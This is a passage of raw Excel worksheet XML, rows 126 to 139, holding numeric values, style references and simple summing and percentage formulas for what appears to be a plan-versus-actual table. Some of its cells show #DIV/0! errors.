        <v>0</v>
      </c>
      <c r="AH126" s="79"/>
      <c r="AI126" s="79"/>
      <c r="AJ126" s="79">
        <f t="shared" ref="AJ126" si="249">AJ127+AJ128</f>
        <v>0</v>
      </c>
      <c r="AK126" s="79"/>
      <c r="AL126" s="79"/>
      <c r="AM126" s="79">
        <f t="shared" ref="AM126" si="250">AM127+AM128</f>
        <v>0</v>
      </c>
      <c r="AN126" s="79"/>
      <c r="AO126" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP126" s="74">
        <f t="shared" si="243"/>
        <v>-5000</v>
      </c>
      <c r="AQ126" s="80"/>
    </row>
    <row r="127" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A127" s="125" t="s">
        <v>116</v>
      </c>
      <c r="B127" s="81" t="s">
        <v>111</v>
      </c>
      <c r="C127" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D127" s="89">
        <v>332</v>
      </c>
      <c r="E127" s="83"/>
      <c r="F127" s="89"/>
      <c r="G127" s="89"/>
      <c r="H127" s="89"/>
      <c r="I127" s="89"/>
      <c r="J127" s="89"/>
      <c r="K127" s="89"/>
      <c r="L127" s="89"/>
      <c r="M127" s="85">
        <v>3000</v>
      </c>
      <c r="N127" s="98"/>
      <c r="O127" s="86"/>
      <c r="P127" s="86"/>
      <c r="Q127" s="86"/>
      <c r="R127" s="87"/>
      <c r="S127" s="87"/>
      <c r="T127" s="87"/>
      <c r="U127" s="87"/>
      <c r="V127" s="87"/>
      <c r="W127" s="87"/>
      <c r="X127" s="87"/>
      <c r="Y127" s="87"/>
      <c r="Z127" s="87"/>
      <c r="AA127" s="87"/>
      <c r="AB127" s="87"/>
      <c r="AC127" s="87"/>
      <c r="AD127" s="87"/>
      <c r="AE127" s="87"/>
      <c r="AF127" s="87"/>
      <c r="AG127" s="87"/>
      <c r="AH127" s="87"/>
      <c r="AI127" s="87"/>
      <c r="AJ127" s="87"/>
      <c r="AK127" s="87"/>
      <c r="AL127" s="87"/>
      <c r="AM127" s="87"/>
      <c r="AN127" s="87"/>
      <c r="AO127" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP127" s="74">
        <f t="shared" si="243"/>
        <v>-3000</v>
      </c>
      <c r="AQ127" s="91"/>
    </row>
    <row r="128" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A128" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B128" s="81" t="s">
        <v>123</v>
      </c>
      <c r="C128" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D128" s="89">
        <v>200</v>
      </c>
      <c r="E128" s="83"/>
      <c r="F128" s="89"/>
      <c r="G128" s="89"/>
      <c r="H128" s="89"/>
      <c r="I128" s="89"/>
      <c r="J128" s="89"/>
      <c r="K128" s="89"/>
      <c r="L128" s="89"/>
      <c r="M128" s="85">
        <v>0</v>
      </c>
      <c r="N128" s="98"/>
      <c r="O128" s="86"/>
      <c r="P128" s="86"/>
      <c r="Q128" s="86"/>
      <c r="R128" s="87"/>
      <c r="S128" s="87"/>
      <c r="T128" s="87"/>
      <c r="U128" s="87"/>
      <c r="V128" s="87"/>
      <c r="W128" s="87"/>
      <c r="X128" s="87"/>
      <c r="Y128" s="87"/>
      <c r="Z128" s="87"/>
      <c r="AA128" s="87"/>
      <c r="AB128" s="87"/>
      <c r="AC128" s="87"/>
      <c r="AD128" s="87"/>
      <c r="AE128" s="87"/>
      <c r="AF128" s="87"/>
      <c r="AG128" s="87"/>
      <c r="AH128" s="87"/>
      <c r="AI128" s="87"/>
      <c r="AJ128" s="87"/>
      <c r="AK128" s="87"/>
      <c r="AL128" s="87"/>
      <c r="AM128" s="87"/>
      <c r="AN128" s="87"/>
      <c r="AO128" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP128" s="74">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AQ128" s="91"/>
    </row>
    <row r="129" spans="1:43" ht="22.5" customHeight="1">
      <c r="A129" s="76" t="s">
        <v>114</v>
      </c>
      <c r="B129" s="24" t="s">
        <v>131</v>
      </c>
      <c r="C129" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D129" s="134">
        <v>139</v>
      </c>
      <c r="E129" s="134">
        <f t="shared" ref="E129:G129" si="251">E131+E134+E135</f>
        <v>140</v>
      </c>
      <c r="F129" s="134">
        <f t="shared" si="251"/>
        <v>14.9</v>
      </c>
      <c r="G129" s="134">
        <f t="shared" si="251"/>
        <v>20.399999999999999</v>
      </c>
      <c r="H129" s="134">
        <f t="shared" ref="H129:I129" si="252">H131+H134+H135</f>
        <v>5.9</v>
      </c>
      <c r="I129" s="134">
        <f t="shared" si="252"/>
        <v>63.4</v>
      </c>
      <c r="J129" s="134">
        <f>J131+J134+J135</f>
        <v>7.1000000000000005</v>
      </c>
      <c r="K129" s="134">
        <f t="shared" ref="K129:L129" si="253">K131+K134+K135</f>
        <v>8.9</v>
      </c>
      <c r="L129" s="134">
        <f t="shared" si="253"/>
        <v>19.899999999999999</v>
      </c>
      <c r="M129" s="141">
        <v>140.19999999999999</v>
      </c>
      <c r="N129" s="201">
        <f>N136+N137+N138+N140</f>
        <v>140.5</v>
      </c>
      <c r="O129" s="142">
        <f>O136+O137+O138+O140</f>
        <v>140.5</v>
      </c>
      <c r="P129" s="142">
        <f t="shared" ref="P129:AM129" si="254">P136+P137+P138+P140</f>
        <v>14.9</v>
      </c>
      <c r="Q129" s="142">
        <v>14.9</v>
      </c>
      <c r="R129" s="142">
        <f t="shared" si="254"/>
        <v>14.9</v>
      </c>
      <c r="S129" s="142"/>
      <c r="T129" s="142">
        <f t="shared" si="254"/>
        <v>20.399999999999999</v>
      </c>
      <c r="U129" s="142">
        <v>20.399999999999999</v>
      </c>
      <c r="V129" s="142">
        <f t="shared" si="254"/>
        <v>20.399999999999999</v>
      </c>
      <c r="W129" s="142"/>
      <c r="X129" s="142">
        <f t="shared" si="254"/>
        <v>5.9</v>
      </c>
      <c r="Y129" s="142">
        <v>5.9</v>
      </c>
      <c r="Z129" s="142">
        <f t="shared" si="254"/>
        <v>5.9</v>
      </c>
      <c r="AA129" s="142"/>
      <c r="AB129" s="142">
        <f t="shared" si="254"/>
        <v>63.4</v>
      </c>
      <c r="AC129" s="142"/>
      <c r="AD129" s="142">
        <f t="shared" si="254"/>
        <v>63.4</v>
      </c>
      <c r="AE129" s="142"/>
      <c r="AF129" s="142">
        <f t="shared" si="254"/>
        <v>7.1000000000000005</v>
      </c>
      <c r="AG129" s="142">
        <f t="shared" si="254"/>
        <v>7.1000000000000005</v>
      </c>
      <c r="AH129" s="142"/>
      <c r="AI129" s="142">
        <f t="shared" si="254"/>
        <v>8.9</v>
      </c>
      <c r="AJ129" s="142">
        <f t="shared" si="254"/>
        <v>8.9</v>
      </c>
      <c r="AK129" s="142"/>
      <c r="AL129" s="142">
        <f t="shared" si="254"/>
        <v>19.899999999999999</v>
      </c>
      <c r="AM129" s="142">
        <f t="shared" si="254"/>
        <v>19.899999999999999</v>
      </c>
      <c r="AN129" s="142"/>
      <c r="AO129" s="73">
        <f t="shared" si="222"/>
        <v>100</v>
      </c>
      <c r="AP129" s="74">
        <f t="shared" si="243"/>
        <v>0.30000000000001137</v>
      </c>
      <c r="AQ129" s="143"/>
    </row>
    <row r="130" spans="1:43" s="189" customFormat="1" ht="22.5" hidden="1" customHeight="1">
      <c r="A130" s="102"/>
      <c r="B130" s="101" t="s">
        <v>71</v>
      </c>
      <c r="C130" s="103" t="s">
        <v>1</v>
      </c>
      <c r="D130" s="144"/>
      <c r="E130" s="145">
        <f>E134+E133</f>
        <v>47</v>
      </c>
      <c r="F130" s="145">
        <f t="shared" ref="F130:L130" si="255">F134+F133</f>
        <v>6.2</v>
      </c>
      <c r="G130" s="145">
        <f t="shared" si="255"/>
        <v>6.1</v>
      </c>
      <c r="H130" s="145">
        <f t="shared" si="255"/>
        <v>5.5</v>
      </c>
      <c r="I130" s="145">
        <f t="shared" si="255"/>
        <v>10</v>
      </c>
      <c r="J130" s="145">
        <f t="shared" si="255"/>
        <v>6.7</v>
      </c>
      <c r="K130" s="145">
        <f t="shared" si="255"/>
        <v>6.5</v>
      </c>
      <c r="L130" s="145">
        <f t="shared" si="255"/>
        <v>6.5</v>
      </c>
      <c r="M130" s="146"/>
      <c r="N130" s="202"/>
      <c r="O130" s="147">
        <f>O133+O134</f>
        <v>47.5</v>
      </c>
      <c r="P130" s="147"/>
      <c r="Q130" s="147">
        <v>6.2</v>
      </c>
      <c r="R130" s="147">
        <f t="shared" ref="R130" si="256">R134+R133</f>
        <v>6.2</v>
      </c>
      <c r="S130" s="147"/>
      <c r="T130" s="147"/>
      <c r="U130" s="147">
        <v>6.1</v>
      </c>
      <c r="V130" s="147">
        <f t="shared" ref="V130" si="257">V134+V133</f>
        <v>6.1</v>
      </c>
      <c r="W130" s="147"/>
      <c r="X130" s="147"/>
      <c r="Y130" s="147">
        <v>5.5</v>
      </c>
      <c r="Z130" s="147">
        <f t="shared" ref="Z130" si="258">Z134+Z133</f>
        <v>5.5</v>
      </c>
      <c r="AA130" s="147"/>
      <c r="AB130" s="147"/>
      <c r="AC130" s="147"/>
      <c r="AD130" s="147">
        <f t="shared" ref="AD130" si="259">AD134+AD133</f>
        <v>10</v>
      </c>
      <c r="AE130" s="147"/>
      <c r="AF130" s="147"/>
      <c r="AG130" s="147">
        <f t="shared" ref="AG130" si="260">AG134+AG133</f>
        <v>6.7</v>
      </c>
      <c r="AH130" s="147"/>
      <c r="AI130" s="147"/>
      <c r="AJ130" s="147">
        <f t="shared" ref="AJ130" si="261">AJ134+AJ133</f>
        <v>6.5</v>
      </c>
      <c r="AK130" s="147"/>
      <c r="AL130" s="147"/>
      <c r="AM130" s="147">
        <f t="shared" ref="AM130" si="262">AM134+AM133</f>
        <v>6.5</v>
      </c>
      <c r="AN130" s="147"/>
      <c r="AO130" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP130" s="74">
        <f t="shared" si="243"/>
        <v>47.5</v>
      </c>
      <c r="AQ130" s="148"/>
    </row>
    <row r="131" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A131" s="102">
        <v>1</v>
      </c>
      <c r="B131" s="101" t="s">
        <v>130</v>
      </c>
      <c r="C131" s="103"/>
      <c r="D131" s="144"/>
      <c r="E131" s="144">
        <f t="shared" ref="E131:I131" si="263">E132+E133</f>
        <v>21.5</v>
      </c>
      <c r="F131" s="144">
        <f t="shared" si="263"/>
        <v>3.7</v>
      </c>
      <c r="G131" s="144">
        <f t="shared" si="263"/>
        <v>2.2999999999999998</v>
      </c>
      <c r="H131" s="144">
        <f t="shared" si="263"/>
        <v>0.4</v>
      </c>
      <c r="I131" s="144">
        <f t="shared" si="263"/>
        <v>3.4</v>
      </c>
      <c r="J131" s="144">
        <f t="shared" ref="J131:L131" si="264">J132+J133</f>
        <v>0.4</v>
      </c>
      <c r="K131" s="144">
        <f t="shared" si="264"/>
        <v>3.5</v>
      </c>
      <c r="L131" s="144">
        <f t="shared" si="264"/>
        <v>5.4</v>
      </c>
      <c r="M131" s="149">
        <v>140.19999999999999</v>
      </c>
      <c r="N131" s="203"/>
      <c r="O131" s="150">
        <f t="shared" ref="O131" si="265">O132+O133</f>
        <v>19.100000000000001</v>
      </c>
      <c r="P131" s="150"/>
      <c r="Q131" s="150">
        <v>3.7</v>
      </c>
      <c r="R131" s="150">
        <f t="shared" ref="R131" si="266">R132+R133</f>
        <v>3.7</v>
      </c>
      <c r="S131" s="150"/>
      <c r="T131" s="150"/>
      <c r="U131" s="150">
        <v>2.2999999999999998</v>
      </c>
      <c r="V131" s="150">
        <f t="shared" ref="V131" si="267">V132+V133</f>
        <v>2.2999999999999998</v>
      </c>
      <c r="W131" s="150"/>
      <c r="X131" s="150"/>
      <c r="Y131" s="150">
        <v>0.4</v>
      </c>
      <c r="Z131" s="150">
        <f t="shared" ref="Z131" si="268">Z132+Z133</f>
        <v>0.4</v>
      </c>
      <c r="AA131" s="150"/>
      <c r="AB131" s="150"/>
      <c r="AC131" s="150"/>
      <c r="AD131" s="150">
        <f t="shared" ref="AD131" si="269">AD132+AD133</f>
        <v>3.4</v>
      </c>
      <c r="AE131" s="150"/>
      <c r="AF131" s="150"/>
      <c r="AG131" s="150">
        <f t="shared" ref="AG131" si="270">AG132+AG133</f>
        <v>0.4</v>
      </c>
      <c r="AH131" s="150"/>
      <c r="AI131" s="150"/>
      <c r="AJ131" s="150">
        <f t="shared" ref="AJ131" si="271">AJ132+AJ133</f>
        <v>3.5</v>
      </c>
      <c r="AK131" s="150"/>
      <c r="AL131" s="150"/>
      <c r="AM131" s="150">
        <f t="shared" ref="AM131" si="272">AM132+AM133</f>
        <v>5.4</v>
      </c>
      <c r="AN131" s="150"/>
      <c r="AO131" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP131" s="74">
        <f t="shared" si="243"/>
        <v>-121.1</v>
      </c>
      <c r="AQ131" s="151"/>
    </row>
    <row r="132" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A132" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B132" s="81" t="s">
        <v>132</v>
      </c>
      <c r="C132" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D132" s="152"/>
      <c r="E132" s="83">
        <v>18</v>
      </c>
      <c r="F132" s="152">
        <v>3.7</v>
      </c>
      <c r="G132" s="152">
        <v>2.2999999999999998</v>
      </c>
      <c r="H132" s="152">
        <v>0.4</v>
      </c>
      <c r="I132" s="152">
        <v>3.4</v>
      </c>
      <c r="J132" s="152">
        <v>0.4</v>
      </c>
      <c r="K132" s="152">
        <v>2.4</v>
      </c>
      <c r="L132" s="152">
        <v>5.4</v>
      </c>
      <c r="M132" s="153">
        <v>47.2</v>
      </c>
      <c r="N132" s="204"/>
      <c r="O132" s="86">
        <f t="shared" ref="O132:O140" si="273">R132+V132+Z132+AD132+AG132+AJ132+AM132</f>
        <v>18</v>
      </c>
      <c r="P132" s="86"/>
      <c r="Q132" s="86">
        <v>3.7</v>
      </c>
      <c r="R132" s="154">
        <v>3.7</v>
      </c>
      <c r="S132" s="154"/>
      <c r="T132" s="86"/>
      <c r="U132" s="86">
        <v>2.2999999999999998</v>
      </c>
      <c r="V132" s="154">
        <v>2.2999999999999998</v>
      </c>
      <c r="W132" s="154"/>
      <c r="X132" s="86"/>
      <c r="Y132" s="86">
        <v>0.4</v>
      </c>
      <c r="Z132" s="154">
        <v>0.4</v>
      </c>
      <c r="AA132" s="154"/>
      <c r="AB132" s="86"/>
      <c r="AC132" s="86"/>
      <c r="AD132" s="154">
        <v>3.4</v>
      </c>
      <c r="AE132" s="154"/>
      <c r="AF132" s="86"/>
      <c r="AG132" s="154">
        <v>0.4</v>
      </c>
      <c r="AH132" s="154"/>
      <c r="AI132" s="86"/>
      <c r="AJ132" s="154">
        <v>2.4</v>
      </c>
      <c r="AK132" s="154"/>
      <c r="AL132" s="86"/>
      <c r="AM132" s="154">
        <v>5.4</v>
      </c>
      <c r="AN132" s="154"/>
      <c r="AO132" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP132" s="74">
        <f t="shared" si="243"/>
        <v>-29.200000000000003</v>
      </c>
      <c r="AQ132" s="155"/>
    </row>
    <row r="133" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A133" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B133" s="81" t="s">
        <v>133</v>
      </c>
      <c r="C133" s="25"/>
      <c r="D133" s="152"/>
      <c r="E133" s="83">
        <v>3.5</v>
      </c>
      <c r="F133" s="152">
        <v>0</v>
      </c>
      <c r="G133" s="152">
        <v>0</v>
      </c>
      <c r="H133" s="152">
        <v>0</v>
      </c>
      <c r="I133" s="152">
        <v>0</v>
      </c>
      <c r="J133" s="152">
        <v>0</v>
      </c>
      <c r="K133" s="152">
        <v>1.1000000000000001</v>
      </c>
      <c r="L133" s="152">
        <v>0</v>
      </c>
      <c r="M133" s="153">
        <v>19.100000000000001</v>
      </c>
      <c r="N133" s="204"/>
      <c r="O133" s="86">
        <f t="shared" si="273"/>
        <v>1.1000000000000001</v>
      </c>
      <c r="P133" s="86"/>
      <c r="Q133" s="86">
        <v>0</v>
      </c>
      <c r="R133" s="154">
        <v>0</v>
      </c>
      <c r="S133" s="154"/>
      <c r="T133" s="86"/>
      <c r="U133" s="86">
        <v>0</v>
      </c>
      <c r="V133" s="154">
        <v>0</v>
      </c>
      <c r="W133" s="154"/>
      <c r="X133" s="86"/>
      <c r="Y133" s="86">
        <v>0</v>
      </c>
      <c r="Z133" s="154">
        <v>0</v>
      </c>
      <c r="AA133" s="154"/>
      <c r="AB133" s="86"/>
      <c r="AC133" s="86"/>
      <c r="AD133" s="154">
        <v>0</v>
      </c>
      <c r="AE133" s="154"/>
      <c r="AF133" s="86"/>
      <c r="AG133" s="154">
        <v>0</v>
      </c>
      <c r="AH133" s="154"/>
      <c r="AI133" s="86"/>
      <c r="AJ133" s="154">
        <v>1.1000000000000001</v>
      </c>
      <c r="AK133" s="154"/>
      <c r="AL133" s="86"/>
      <c r="AM133" s="154">
        <v>0</v>
      </c>
      <c r="AN133" s="154"/>
      <c r="AO133" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP133" s="74">
        <f t="shared" si="243"/>
        <v>-18</v>
      </c>
      <c r="AQ133" s="155"/>
    </row>
    <row r="134" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A134" s="102">
        <v>2</v>
      </c>
      <c r="B134" s="101" t="s">
        <v>137</v>
      </c>
      <c r="C134" s="103" t="s">
        <v>1</v>
      </c>
      <c r="D134" s="144"/>
      <c r="E134" s="145">
        <v>43.5</v>
      </c>
      <c r="F134" s="144">
        <v>6.2</v>
      </c>
      <c r="G134" s="144">
        <v>6.1</v>
      </c>
      <c r="H134" s="144">
        <v>5.5</v>
      </c>
      <c r="I134" s="144">
        <v>10</v>
      </c>
      <c r="J134" s="144">
        <v>6.7</v>
      </c>
      <c r="K134" s="144">
        <v>5.4</v>
      </c>
      <c r="L134" s="144">
        <v>6.5</v>
      </c>
      <c r="M134" s="149">
        <v>18</v>
      </c>
      <c r="N134" s="203"/>
      <c r="O134" s="86">
        <f t="shared" si="273"/>
        <v>46.4</v>
      </c>
      <c r="P134" s="86"/>
      <c r="Q134" s="86">
        <v>6.2</v>
      </c>
      <c r="R134" s="150">
        <v>6.2</v>
      </c>
      <c r="S134" s="150"/>
      <c r="T134" s="86"/>
      <c r="U134" s="86">
        <v>6.1</v>
      </c>
      <c r="V134" s="150">
        <v>6.1</v>
      </c>
      <c r="W134" s="150"/>
      <c r="X134" s="86"/>
      <c r="Y134" s="86">
        <v>5.5</v>
      </c>
      <c r="Z134" s="150">
        <v>5.5</v>
      </c>
      <c r="AA134" s="150"/>
      <c r="AB134" s="86"/>
      <c r="AC134" s="86"/>
      <c r="AD134" s="150">
        <v>10</v>
      </c>
      <c r="AE134" s="150"/>
      <c r="AF134" s="86"/>
      <c r="AG134" s="150">
        <v>6.7</v>
      </c>
      <c r="AH134" s="150"/>
      <c r="AI134" s="86"/>
      <c r="AJ134" s="150">
        <v>5.4</v>
      </c>
      <c r="AK134" s="150"/>
      <c r="AL134" s="86"/>
      <c r="AM134" s="150">
        <v>6.5</v>
      </c>
      <c r="AN134" s="150"/>
      <c r="AO134" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP134" s="74">
        <f t="shared" si="243"/>
        <v>28.4</v>
      </c>
      <c r="AQ134" s="151"/>
    </row>
    <row r="135" spans="1:43" s="189" customFormat="1" ht="22.5" hidden="1" customHeight="1">
      <c r="A135" s="102">
        <v>3</v>
      </c>
      <c r="B135" s="101" t="s">
        <v>138</v>
      </c>
      <c r="C135" s="103" t="s">
        <v>1</v>
      </c>
      <c r="D135" s="144"/>
      <c r="E135" s="145">
        <v>75</v>
      </c>
      <c r="F135" s="145">
        <v>5</v>
      </c>
      <c r="G135" s="145">
        <v>12</v>
      </c>
      <c r="H135" s="145">
        <v>0</v>
      </c>
      <c r="I135" s="145">
        <v>50</v>
      </c>
      <c r="J135" s="145">
        <v>0</v>
      </c>
      <c r="K135" s="145">
        <v>0</v>
      </c>
      <c r="L135" s="145">
        <v>8</v>
      </c>
      <c r="M135" s="146">
        <v>1.1000000000000001</v>
      </c>
      <c r="N135" s="202"/>
      <c r="O135" s="147">
        <f t="shared" si="273"/>
        <v>75</v>
      </c>
      <c r="P135" s="147"/>
      <c r="Q135" s="147">
        <v>5</v>
      </c>
      <c r="R135" s="147">
        <v>5</v>
      </c>
      <c r="S135" s="147"/>
      <c r="T135" s="147"/>
      <c r="U135" s="147">
        <v>12</v>
      </c>
      <c r="V135" s="147">
        <v>12</v>
      </c>
      <c r="W135" s="147"/>
      <c r="X135" s="147"/>
      <c r="Y135" s="147">
        <v>0</v>
      </c>
      <c r="Z135" s="147">
        <v>0</v>
      </c>
      <c r="AA135" s="147"/>
      <c r="AB135" s="147"/>
      <c r="AC135" s="147"/>
      <c r="AD135" s="147">
        <v>50</v>
      </c>
      <c r="AE135" s="147"/>
      <c r="AF135" s="147"/>
      <c r="AG135" s="147">
        <v>0</v>
      </c>
      <c r="AH135" s="147"/>
      <c r="AI135" s="147"/>
      <c r="AJ135" s="147">
        <v>0</v>
      </c>
      <c r="AK135" s="147"/>
      <c r="AL135" s="147"/>
      <c r="AM135" s="147">
        <v>8</v>
      </c>
      <c r="AN135" s="147"/>
      <c r="AO135" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP135" s="74">
        <f t="shared" si="243"/>
        <v>73.900000000000006</v>
      </c>
      <c r="AQ135" s="148"/>
    </row>
    <row r="136" spans="1:43" s="189" customFormat="1" ht="27" customHeight="1">
      <c r="A136" s="45" t="s">
        <v>153</v>
      </c>
      <c r="B136" s="46" t="s">
        <v>154</v>
      </c>
      <c r="C136" s="47" t="s">
        <v>1</v>
      </c>
      <c r="D136" s="144"/>
      <c r="E136" s="145"/>
      <c r="F136" s="145"/>
      <c r="G136" s="145"/>
      <c r="H136" s="145"/>
      <c r="I136" s="145"/>
      <c r="J136" s="145"/>
      <c r="K136" s="145"/>
      <c r="L136" s="145"/>
      <c r="M136" s="146">
        <v>46.1</v>
      </c>
      <c r="N136" s="98">
        <f>P136+T136+X136+AB136+AF136+AI136+AL136</f>
        <v>46.4</v>
      </c>
      <c r="O136" s="147">
        <f t="shared" si="273"/>
        <v>46.4</v>
      </c>
      <c r="P136" s="48">
        <v>6.2</v>
      </c>
      <c r="Q136" s="49"/>
      <c r="R136" s="147">
        <v>6.2</v>
      </c>
      <c r="S136" s="156"/>
      <c r="T136" s="48">
        <v>6.1</v>
      </c>
      <c r="U136" s="49"/>
      <c r="V136" s="147">
        <v>6.1</v>
      </c>
      <c r="W136" s="156"/>
      <c r="X136" s="48">
        <v>5.5</v>
      </c>
      <c r="Y136" s="49"/>
      <c r="Z136" s="147">
        <v>5.5</v>
      </c>
      <c r="AA136" s="156"/>
      <c r="AB136" s="48">
        <v>10</v>
      </c>
      <c r="AC136" s="49"/>
      <c r="AD136" s="147">
        <v>10</v>
      </c>
      <c r="AE136" s="156"/>
      <c r="AF136" s="48">
        <v>6.7</v>
      </c>
      <c r="AG136" s="147">
        <v>6.7</v>
      </c>
      <c r="AH136" s="156"/>
      <c r="AI136" s="48">
        <v>5.4</v>
      </c>
      <c r="AJ136" s="147">
        <v>5.4</v>
      </c>
      <c r="AK136" s="156"/>
      <c r="AL136" s="48">
        <v>6.5</v>
      </c>
      <c r="AM136" s="147">
        <v>6.5</v>
      </c>
      <c r="AN136" s="147"/>
      <c r="AO136" s="73">
        <f t="shared" si="222"/>
        <v>100</v>
      </c>
      <c r="AP136" s="74">
        <f t="shared" si="243"/>
        <v>0.29999999999999716</v>
      </c>
      <c r="AQ136" s="148"/>
    </row>
    <row r="137" spans="1:43" s="189" customFormat="1" ht="27" customHeight="1">
      <c r="A137" s="45" t="s">
        <v>155</v>
      </c>
      <c r="B137" s="46" t="s">
        <v>156</v>
      </c>
      <c r="C137" s="47" t="s">
        <v>1</v>
      </c>
      <c r="D137" s="144"/>
      <c r="E137" s="145"/>
      <c r="F137" s="145"/>
      <c r="G137" s="145"/>
      <c r="H137" s="145"/>
      <c r="I137" s="145"/>
      <c r="J137" s="145"/>
      <c r="K137" s="145"/>
      <c r="L137" s="145"/>
      <c r="M137" s="146">
        <v>75</v>
      </c>
      <c r="N137" s="202"/>
      <c r="O137" s="147">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="P137" s="147"/>
      <c r="Q137" s="147"/>
      <c r="R137" s="147"/>
      <c r="S137" s="147"/>
      <c r="T137" s="147"/>
      <c r="U137" s="147"/>
      <c r="V137" s="147"/>
      <c r="W137" s="147"/>
      <c r="X137" s="147"/>
      <c r="Y137" s="147"/>
      <c r="Z137" s="147"/>
      <c r="AA137" s="147"/>
      <c r="AB137" s="147"/>
      <c r="AC137" s="147"/>
      <c r="AD137" s="147"/>
      <c r="AE137" s="147"/>
      <c r="AF137" s="147"/>
      <c r="AG137" s="147"/>
      <c r="AH137" s="147"/>
      <c r="AI137" s="147"/>
      <c r="AJ137" s="147"/>
      <c r="AK137" s="147"/>
      <c r="AL137" s="147"/>
      <c r="AM137" s="147"/>
      <c r="AN137" s="147"/>
      <c r="AO137" s="73"/>
      <c r="AP137" s="74">
        <f t="shared" si="243"/>
        <v>-75</v>
      </c>
      <c r="AQ137" s="148"/>
    </row>
    <row r="138" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A138" s="45" t="s">
        <v>157</v>
      </c>
      <c r="B138" s="46" t="s">
        <v>158</v>
      </c>
      <c r="C138" s="47" t="s">
        <v>1</v>
      </c>
      <c r="D138" s="144"/>
      <c r="E138" s="145"/>
      <c r="F138" s="145"/>
      <c r="G138" s="145"/>
      <c r="H138" s="145"/>
      <c r="I138" s="145"/>
      <c r="J138" s="145"/>
      <c r="K138" s="145"/>
      <c r="L138" s="145"/>
      <c r="M138" s="146">
        <v>19.100000000000001</v>
      </c>
      <c r="N138" s="98">
        <f>P138+T138+X138+AB138+AF138+AI138+AL138</f>
        <v>19.100000000000001</v>
      </c>
      <c r="O138" s="147">
        <f t="shared" si="273"/>
        <v>19.100000000000001</v>
      </c>
      <c r="P138" s="50">
        <v>3.7</v>
      </c>
      <c r="Q138" s="51"/>
      <c r="R138" s="147">
        <v>3.7</v>
      </c>
      <c r="S138" s="156"/>
      <c r="T138" s="50">
        <v>2.2999999999999998</v>
      </c>
      <c r="U138" s="51"/>
      <c r="V138" s="147">
        <v>2.2999999999999998</v>
      </c>
      <c r="W138" s="156"/>
      <c r="X138" s="50">
        <v>0.4</v>
      </c>
      <c r="Y138" s="51"/>
      <c r="Z138" s="147">
        <v>0.4</v>
      </c>
      <c r="AA138" s="156"/>
      <c r="AB138" s="50">
        <v>3.4</v>
      </c>
      <c r="AC138" s="51"/>
      <c r="AD138" s="147">
        <v>3.4</v>
      </c>
      <c r="AE138" s="156"/>
      <c r="AF138" s="50">
        <v>0.4</v>
      </c>
      <c r="AG138" s="147">
        <v>0.4</v>
      </c>
      <c r="AH138" s="156"/>
      <c r="AI138" s="50">
        <v>3.5</v>
      </c>
      <c r="AJ138" s="147">
        <v>3.5</v>
      </c>
      <c r="AK138" s="156"/>
      <c r="AL138" s="50">
        <v>5.4</v>
      </c>
      <c r="AM138" s="147">
        <v>5.4</v>
      </c>
      <c r="AN138" s="147"/>
      <c r="AO138" s="73">
        <f>O138/N138*100</f>
        <v>100</v>
      </c>
      <c r="AP138" s="74">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AQ138" s="148"/>
    </row>
    <row r="139" spans="1:43" s="189" customFormat="1" ht="22.5" customHeight="1">
      <c r="A139" s="52" t="s">
        <v>3</v>
      </c>
      <c r="B139" s="44" t="s">
        <v>159</v>
      </c>
      <c r="C139" s="53" t="s">
        <v>1</v>
      </c>
      <c r="D139" s="144"/>
      <c r="E139" s="145"/>
      <c r="F139" s="145"/>
      <c r="G139" s="145"/>
      <c r="H139" s="145"/>
      <c r="I139" s="145"/>
      <c r="J139" s="145"/>
      <c r="K139" s="145"/>
      <c r="L139" s="145"/>
      <c r="M139" s="146">
        <v>47.2</v>
      </c>
      <c r="N139" s="202"/>
      <c r="O139" s="147">
        <f t="shared" si="273"/>
        <v>0</v>
      </c>
      <c r="P139" s="147"/>
      <c r="Q139" s="147"/>
      <c r="R139" s="147"/>
      <c r="S139" s="147"/>
      <c r="T139" s="147"/>
      <c r="U139" s="147"/>
      <c r="V139" s="147"/>
      <c r="W139" s="147"/>
      <c r="X139" s="147"/>
      <c r="Y139" s="147"/>
      <c r="Z139" s="147"/>
      <c r="AA139" s="147"/>
      <c r="AB139" s="147"/>
      <c r="AC139" s="147"/>
      <c r="AD139" s="147"/>
      <c r="AE139" s="147"/>
      <c r="AF139" s="147"/>
      <c r="AG139" s="147"/>
      <c r="AH139" s="147"/>
      <c r="AI139" s="147"/>
      <c r="AJ139" s="147"/>
      <c r="AK139" s="147"/>
      <c r="AL139" s="147"/>
      <c r="AM139" s="147"/>
      <c r="AN139" s="147"/>
      <c r="AO139" s="73"/>
      <c r="AP139" s="74">
        <f t="shared" si="243"/>
        <v>-47.2</v>
      </c>
      <c r="AQ139" s="148"/>
    </row>
